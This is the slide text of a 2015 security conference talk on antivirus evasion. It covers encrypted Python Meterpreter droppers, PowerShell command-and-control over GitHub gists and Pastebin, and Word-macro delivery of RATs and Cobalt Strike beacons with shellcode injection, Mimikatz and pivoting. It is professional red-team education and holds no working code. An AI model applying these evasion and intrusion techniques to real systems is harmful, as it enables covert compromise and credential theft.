1
Evading Defenses with Acidrain, Powershell, Github and Pastebin
Mike Poor and Jay Beale Adam Crompton, Tyler Robinson and John Sawyer
InGuardians
(bonus booth talk on Word macro-based exploitation and remote access tool)
Copyright 2015 InGuardians, Inc.
2 Copyright 2015 InGuardians, Inc.
Evasion Tactics • Self-decrypting Python Droppers • Powershell In-Memory Command and Control • (Booth) Macro Execution and the Throwback
Remote Access Tool
• Anti-virus vendor chosen: – Symantec Endpoint Protection 12.1.16
3 Copyright 2015 InGuardians, Inc.
AcidRain • We've never been caught by A/V with AcidRain • Encrypts Python in AES-256
– We use msfvenom's Python version of the Meterpreter • Pyinstaller to create an EXE • Methods of obtaining key
– Keep the key in the payload – Socket connect (nc –l) – Web request (python SimpleHTTPServer)
• This works for any Python code.
4 Copyright 2015 InGuardians, Inc.
AcidRain Modules • System profiler
– Mac, Linux, Windows – Automated post-exploitation profiling commands – Phones home, sends profiling output, cuts connection – Reconnects after a pre-defined time
• SOCKS4 proxy • Bind shell • Reverse shell
5 Copyright 2015 InGuardians, Inc.
Uses Pyinstaller • Pyinstaller bundles python applications into a
single exe file. • Run on Linux using Wine:
wine c:\\Python27\\python.exe /usr/share/pyinstaller/pyinstaller.py /home/user/hello.py --onefile
6 Copyright 2015 InGuardians, Inc.
Demo
AcidRain
(Video will be linked to from InGuardians website within one week)
7 Copyright 2015 InGuardians, Inc.
Puppet Master C2 Framework • Powershell Command and Control (C2) via third
party widely-used services • Current payloads:
– Invoke-Github.ps1 – Invoke-Pastebin.ps1
• If these are blocked, we can create more, making the defenders play Whack-a-Mole!
• Submitting these to @harmjoy for Empire inclusion
8 Copyright 2015 InGuardians, Inc.
Powershell Commands • The attacker types powershell commands and
receives their output. • This is incredibly powerful, as we can use all
the Powershell frameworks, our own commandlets or just start running commands.
9 Copyright 2015 InGuardians, Inc.
Github and Pastebin • On Github, we create a "gist," a non-project
code publish – All C2 data is comments on the gist.
• On Pastebin, we create a paste. – Expiration date is set to a short time, say, one
hour.
10 Copyright 2015 InGuardians, Inc.
Encryption • Prereq: Powershell v2.0 and .NET version 4.0 • Encryption Used: AES 256-bit using ConvertTo-
SecureString and ConvertFrom-SecureString commandlets
• All commands and results are encrypted before posting to the third party page, to avoid divulging any data.
11 Copyright 2015 InGuardians, Inc.
1. How Does the C2 Func2on
Victim
Attacker Third Party Service
Pastebin Github
Beacon checks in for a new command with dynamic jitter rate
12 Copyright 2015 InGuardians, Inc.
2. How Does the C2 Func2on
Victim
Attacker Third Party Service
Pastebin Github
Attacker sends a command in a request to third party service's API
13 Copyright 2015 InGuardians, Inc.
3. How Does the C2 Func2on
Victim
Attacker Third Party Service
Pastebin Github
Attacker polls the third party service until a response is posted.
14 Copyright 2015 InGuardians, Inc.
4. How Does the C2 Func2on
Victim
Attacker Third Party Service
Pastebin Github
Beacon gets the command that the attacker stored in the post and runs on the host.
15 Copyright 2015 InGuardians, Inc.
5. How Does the C2 Func2on
Victim
Attacker Third Party Service
Pastebin Github
Beacon sends command output back to the third party service.
16 Copyright 2015 InGuardians, Inc.
6. How Does the C2 Func2on
Victim
Attacker Third Party Service
Pastebin Github
Attacker gets response from server.
17 Copyright 2015 InGuardians, Inc.
DEMO
Invoke-Pastebin.ps1 Invoke-Github.ps1
(Video will be linked to from InGuardians website within one week)
18 Copyright 2015 InGuardians, Inc.
Booth: Macro-Based Injection • Threat actors don’t always use sophisticated
attacks. • Why use a $10k 0-Day or reverse engineer a
protocol when a simple email will work. • Microsoft Office Macro-Based Payload Injection
– Great way to get an initial foothold or gain more access in the environment.
– Utilize memory-based injections
19 Copyright 2015 InGuardians, Inc.
Executables Embedded in Macros
• We use Office Developer Tools to create a macro containing an encrypted and base64-encoded payload.
• We place the macro in a document, formatted as a regular .doc or .xls file. – It does not have to be the .docm format.
• The payload executes silently in the background. • This payload could be an .EXE or a .DLL file.
20 Copyright 2015 InGuardians, Inc.
Additional A/V Evasion • The macro can drop the payload to disk as a
compressed archive to help avoid detection. • We can extract a DLL as a .log file in a hidden
directory and run it using rundll32.exe. • In this case, we're going to place the Throwback
open source RAT onto the system via the macro.
21 Copyright 2015 InGuardians, Inc.
Payload and Persistence • In this demo, the Throwback backdoor:
– drops a .exe into a hidden directory as a hidden file – runs this .exe, which deletes its on-disk file – which in turn copies a second .exe to a different
hidden directory as a different hidden file. – and creates a service and checks proxy settings to gain
Internet access to call home all using native Windows API calls.
22 Copyright 2015 InGuardians, Inc.
Throwback RAT • We use the Throwback RAT as a long term
foothold in the organization. • The RAT beacons home over HTTP(s) & DNS
using winhttp/wininet for proxy awareness. • The backdoor is then used to pivot to other
boxes, where we deploy RAT’s on systems other than beaconing hosts, to retain access and avoid detection.
23 Copyright 2015 InGuardians, Inc.
DLL Execution: Cobalt Strike Beacon
• Here, we place the Cobalt Strike Reverse HTTPS Beacon on the victim as perflib0.log and execute with rundll32.exe.
• Run Mimikatz and hashdump for cleartext passwords and local hashes.
• We could also use the beacon to spawn meterpreter in memory, use powershell, pivot, scan and attack.
24 Copyright 2015 InGuardians, Inc.
Injecting Shellcode into a Process
• We also inject a meterpreter payload into an already-running process by generating raw shell code (perflib0.html) and inject it into a process.
• This was not detected by AV.
25 Copyright 2015 InGuardians, Inc.
Steps in the Video 1 of 2
1. Create a Word macro and e-mail to a SE victim. 2. Victim opens the Word doc and approves
macro. 3. Throwback binary starts, connects to PHP app. 4. Get a process list to find process to inject in. 5. Create Meterpreter shellcode (perflib0.html) 6. Download Cobalt Strike (perflib0.log)
26 Copyright 2015 InGuardians, Inc.
Steps in the Video 2 of 2
7. Instruct victim to rundll32 perflib0.log 8. Instruct victim to download shellcode and inject
into PID 1560. 9. Interact over Cobalt Strike. 10. Interact over Meterpeter session.
27 Copyright 2015 InGuardians, Inc.
Demo (Video will be linked to from InGuardians website within one week)
28 Copyright 2015 InGuardians, Inc.
Pivot, Pivot, Pivot • With an initial foothold, the goal is to always
pivot and avoid detection. • With good OPSec, you can maintain long-term
access as well as pivot and attack.